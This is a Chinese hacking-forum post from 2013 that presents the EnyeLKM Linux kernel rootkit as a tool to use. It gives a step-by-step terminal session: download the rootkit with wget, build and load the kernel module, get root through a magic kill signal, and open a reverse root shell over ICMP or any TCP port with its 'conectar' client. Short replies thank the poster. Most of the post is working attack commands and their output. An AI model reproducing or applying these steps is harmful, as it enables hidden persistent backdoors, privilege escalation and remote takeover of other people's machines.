切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
398 EnyeLKM rootkit[复制链接]
发表于 2013-1-18 19:03:05 | 显示全部楼层 |!read_mode!
非常好的ROOTKIT 远程连接(任意TCP端口或者icmp包) 获得ROOT权限


  1. [root@localhost ~]# wget http://lucky.fuzzexp.org/file/r00tk1t/enyelkm-1.2.tar.gz
  2. [root@localhost ~]# tar xf enyelkm-1.2.tar.gz
  3. [root@localhost ~]# cd enyelkm-1.2
  4. [root@localhost enyelkm-1.2]# ls
  5. base.c  conectar.c  config.h  kill.c  kill.h  LEEME.txt  ls.c  ls.h  Makefile  read.c  read.h  remoto.c  remoto.h  syscalls.h  VERSIONS
  6. [root@localhost enyelkm-1.2]# make

  7. ----------------------------------------------
  8. ENYELKM v1.2 by RaiSe && David Reguera
  9. raise@enye-sec.org | davidregar@yahoo.es

  10. http://www.enye-sec.org

  11. ----------------------------------------------

  12. make -C /lib/modules/2.6.18-308.24.1.el5/build SUBDIRS=/root/enyelkm-1.2 modules
  13. make[1]: Entering directory `/usr/src/kernels/2.6.18-308.24.1.el5-i686'
  14.   CC [M]  /root/enyelkm-1.2/base.o
  15.   CC [M]  /root/enyelkm-1.2/kill.o
  16.   CC [M]  /root/enyelkm-1.2/ls.o
  17.   CC [M]  /root/enyelkm-1.2/read.o
  18.   CC [M]  /root/enyelkm-1.2/remoto.o
  19.   LD [M]  /root/enyelkm-1.2/enyelkm.o
  20.   Building modules, stage 2.
  21.   MODPOST
  22.   CC      /root/enyelkm-1.2/enyelkm.mod.o
  23.   LD [M]  /root/enyelkm-1.2/enyelkm.ko
  24. make[1]: Leaving directory `/usr/src/kernels/2.6.18-308.24.1.el5-i686'
  25. gcc conectar.c -o conectar -Wall
复制代码


加载MOD
  1. [root@localhost enyelkm-1.2]# insmod enyelkm.ko
  2. [root@localhost enyelkm-1.2]# lsmod | grep enyelkm
复制代码


获得ROOT权限
  1. [root@localhost enyelkm-1.2]# su brk
  2. [brk@localhost enyelkm-1.2]$ kill -s 58 12345
  3. [brk@localhost enyelkm-1.2]$ id
  4. uid=0(root) gid=0(root) groups=500(brk) context=root:system_r:unconfined_t:SystemLow-SystemHigh
  5. [brk@localhost enyelkm-1.2]$
复制代码


连接SHELL
  1. [brk@localhost enyelkm-1.2]$ ./conectar

  2. Programa para activar el acceso remoto del enyelkm v1.2:

  3. Peticion ICMP: ./conectar -icmp ip_destino [puerto_shell]
  4. Peticion TCP: ./conectar -tcp ip_destino puerto_destino [puerto_shell]

  5. - ip_destino: ip de la maquina con enyelkm instalado
  6. - puerto_shell: puerto local en el que se recibira la shell (x def: 8822)
  7. - puerto_destino: puerto abierto al que se enviara la firma TCP (21, 80, ...)

  8. [brk@localhost enyelkm-1.2]$
复制代码


最好用icmp包
  1. [brk@localhost enyelkm-1.2]$ ./conectar -icmp 127.0.0.1

  2. * Lanzando reverse_shell:

  3. Enviando ICMP ...
  4. Esperando shell en puerto 8822 (puede tardar unos segundos) ...
  5. lanzando shell ...

  6. id
  7. bash: no job control in this shell
  8. bash-3.2# uid=0(root) gid=1217500843 groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
  9. bash-3.2#
复制代码


任意TCP端口连接SHELL
  1. [brk@localhost enyelkm-1.2]$ ./conectar -tcp 127.0.0.1 22

  2. * Lanzando reverse_shell:

  3. Enviando firma TCP al puerto 22 ...
  4. Esperando shell en puerto 8823 (puede tardar unos segundos) ...
  5. lanzando shell ...

  6. id
  7. bash: no job control in this shell
  8. bash-3.2# uid=0(root) gid=1217500843 groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
  9. bash-3.2#
复制代码


连接工具编译:gcc conectar.c -o conectar -Wall

操千曲而后晓声,观千剑而后识器。
发表于 2015-9-22 14:42:27 | 显示全部楼层
新手第一帖啊,斗胆回复求学习!
发表于 2016-9-21 16:54:42 | 显示全部楼层
很好的文章。

代码区

GMT+8, 2019-11-17 08:34

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部